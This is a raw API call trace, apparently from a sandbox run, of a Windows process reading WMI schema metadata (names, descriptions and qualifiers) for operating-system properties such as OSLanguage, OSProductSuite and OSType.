	[0111.289] IWbemClassObject:Get (in: This=0x2ad2069cf00, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.289] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.289] SysStringLen (param_1="Organization") returned 0xc
	[0111.289] SysStringLen (param_1="Description") returned 0xb
	[0111.289] SysStringLen (param_1="Organization") returned 0xc
	[0111.289] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.289] SysStringLen (param_1="Organization") returned 0xc
	[0111.289] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.289] SysStringLen (param_1="Organization") returned 0xc
	[0111.289] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.289] SysStringLen (param_1="Organization") returned 0xc
	[0111.289] SysStringLen (param_1="Name") returned 0x4
	[0111.289] SysStringLen (param_1="Organization") returned 0xc
	[0111.289] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.289] SysStringLen (param_1="Organization") returned 0xc
	[0111.289] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.289] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.289] SysStringLen (param_1="Organization") returned 0xc
	[0111.290] IUnknown:Release (This=0x2ad2069cf00) returned 0x1
	[0111.290] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.290] IWbemClassObject:Get (in: This=0x2ad2069c9a0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b538, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.290] IWbemClassObject:Get (in: This=0x2ad2069c9a0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b678, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.290] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.291] IWbemClassObject:Get (in: This=0x2ad2069c9a0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The OSLanguage property indicates which language version of the operating system is installed./nExample: 0x0807 (German, Switzerland)", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.291] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.291] lstrlenA (lpString="") returned 0
	[0111.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c230, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.291] SysStringLen (param_1="The OSLanguage property indicates which language version of the operating system is installed./nExample: 0x0807 (German, Switzerland)") returned 0x85
	[0111.291] SysStringLen (param_1="") returned 0x0
	[0111.292] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.292] IWbemClassObject:Get (in: This=0x2ad2069c9a0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.292] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.292] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.292] SysStringLen (param_1="Description") returned 0xb
	[0111.292] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.292] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.292] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.292] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.292] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.292] SysStringLen (param_1="Name") returned 0x4
	[0111.293] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.293] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.293] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.293] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.293] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.293] SysStringLen (param_1="Organization") returned 0xc
	[0111.293] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.293] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.293] IUnknown:Release (This=0x2ad2069c9a0) returned 0x1
	[0111.293] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.293] IWbemClassObject:Get (in: This=0x2ad2069c440, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ac918, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.294] IWbemClassObject:Get (in: This=0x2ad2069c440, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ac978, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.294] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.294] IWbemClassObject:Get (in: This=0x2ad2069c440, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The OSProductSuite property identifies installed and licensed system product additions to the operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.295] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.295] lstrlenA (lpString="") returned 0
	[0111.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c240, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.295] SysStringLen (param_1="The OSProductSuite property identifies installed and licensed system product additions to the operating system.") returned 0x6f
	[0111.295] SysStringLen (param_1="") returned 0x0
	[0111.295] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.296] IWbemClassObject:Get (in: This=0x2ad2069c440, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.296] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.296] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.296] SysStringLen (param_1="Description") returned 0xb
	[0111.296] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.296] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.296] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.296] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.296] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.296] SysStringLen (param_1="Name") returned 0x4
	[0111.296] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.296] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.296] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.296] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.296] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.296] SysStringLen (param_1="Organization") returned 0xc
	[0111.296] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.296] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.297] IUnknown:Release (This=0x2ad2069c440) returned 0x1
	[0111.297] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.297] IWbemClassObject:Get (in: This=0x2ad2069c6f0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b678, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.297] IWbemClassObject:Get (in: This=0x2ad2069c6f0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b6b8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.297] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.298] IWbemClassObject:Get (in: This=0x2ad2069c6f0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="A integer indicating the type of operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.298] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.298] lstrlenA (lpString="") returned 0
	[0111.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.299] SysStringLen (param_1="A integer indicating the type of operating system.") returned 0x32
	[0111.299] SysStringLen (param_1="") returned 0x0
	[0111.299] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.299] IWbemClassObject:Get (in: This=0x2ad2069c6f0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064ba00*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad20632e80, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.301] SafeArrayGetLBound (in: psa=0x2ad2064ba00, nDim=0x1, plLbound=0xd7edd8f164 | out: plLbound=0xd7edd8f164) returned 0x0
	[0111.301] SafeArrayGetUBound (in: psa=0x2ad2064ba00, nDim=0x1, plUbound=0xd7edd8f168 | out: plUbound=0xd7edd8f168) returned 0x0
	[0111.301] SafeArrayGetElement (in: psa=0x2ad2064ba00, rgIndices=0xd7edd8f140, pv=0xd7edd8f138 | out: pv=0xd7edd8f138) returned 0x0
	[0111.301] IWbemClassObject:Get (in: This=0x2ad206a4d50, wszName="Name", lFlags=0, pVal=0xd7edd8f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.302] IWbemClassObject:Get (in: This=0x2ad206a4d50, wszName="QualifierValue", lFlags=0, pVal=0xd7edd8f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1b8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064aac0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad206b02c0, rgsabound=((cElements=0x3a, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.302] SafeArrayGetLBound (in: psa=0x2ad2064aac0, nDim=0x1, plLbound=0xd7edd8f15c | out: plLbound=0xd7edd8f15c) returned 0x0
	[0111.302] SafeArrayGetUBound (in: psa=0x2ad2064aac0, nDim=0x1, plUbound=0xd7edd8f158 | out: plUbound=0xd7edd8f158) returned 0x0
	[0111.302] lstrlenW (lpString="CIMTYPE") returned 7
	[0111.302] lstrlenW (lpString="Values") returned 6
	[0111.302] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.302] lstrlenW (lpString="read") returned 4
	[0111.302] lstrlenW (lpString="Values") returned 6
	[0111.302] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0111.302] lstrlenW (lpString="write") returned 5
	[0111.302] lstrlenW (lpString="Values") returned 6
	[0111.302] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.302] lstrlenW (lpString="In") returned 2
	[0111.302] lstrlenW (lpString="Values") returned 6
	[0111.302] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.302] lstrlenW (lpString="Out") returned 3
	[0111.302] lstrlenW (lpString="Values") returned 6
	[0111.302] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0111.302] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.303] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.303] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.303] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.303] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.303] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.304] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.304] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.304] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.304] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.304] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.305] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.305] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.305] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.305] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.305] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.306] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.306] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.306] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.306] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.307] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.307] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.307] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.308] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.308] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.308] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.308] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.309] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.309] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.309] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.309] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.310] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.310] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.310] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.310] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.310] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.311] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.311] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.311] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.311] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.311] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.312] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.312] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.312] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.312] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.313] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.313] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.313] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.313] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.313] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.314] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.314] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.314] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.314] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.314] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.315] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.315] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.315] SafeArrayGetElement (in: psa=0x2ad2064aac0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.316] IUnknown:Release (This=0x2ad206a4d50) returned 0x1
	[0111.317] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.317] SysStringLen (param_1="OSType") returned 0x6
	[0111.317] SysStringLen (param_1="Description") returned 0xb
	[0111.317] SysStringLen (param_1="OSType") returned 0x6
	[0111.317] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.317] SysStringLen (param_1="OSType") returned 0x6
	[0111.317] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.317] SysStringLen (param_1="OSType") returned 0x6
	[0111.317] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.317] SysStringLen (param_1="OSType") returned 0x6
	[0111.317] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.318] SysStringLen (param_1="OSType") returned 0x6
	[0111.318] SysStringLen (param_1="Organization") returned 0xc
	[0111.318] SysStringLen (param_1="OSType") returned 0x6
	[0111.318] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.318] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0111.318] SysStringLen (param_1="OSType") returned 0x6
	[0111.318] IUnknown:Release (This=0x2ad2069c6f0) returned 0x1
	[0111.318] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.318] IWbemClassObject:Get (in: This=0x2ad2069cc50, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206acbe8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.319] IWbemClassObject:Get (in: This=0x2ad2069cc50, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206acc18, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.319] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.319] IWbemClassObject:Get (in: This=0x2ad2069cc50, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="A string describing the manufacturer and operating system type - used when the operating system property, OSType, is set to 1 (\"Other\"). The format of the string inserted in OtherTypeDescription should be similar in format to the Values strings defined for OSType.  OtherTypeDescription should be set to NULL when OSType is any value other than 1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.320] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.320] lstrlenA (lpString="") returned 0
	[0111.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c130, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.320] SysStringLen (param_1="A string describing the manufacturer and operating system type - used when the operating system property, OSType, is set to 1 (\"Other\"). The format of the string inserted in OtherTypeDescription should be similar in format to the Values strings defined for OSType.  OtherTypeDescription should be set to NULL when OSType is any value other than 1.") returned 0x15b
	[0111.320] SysStringLen (param_1="") returned 0x0
	[0111.320] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
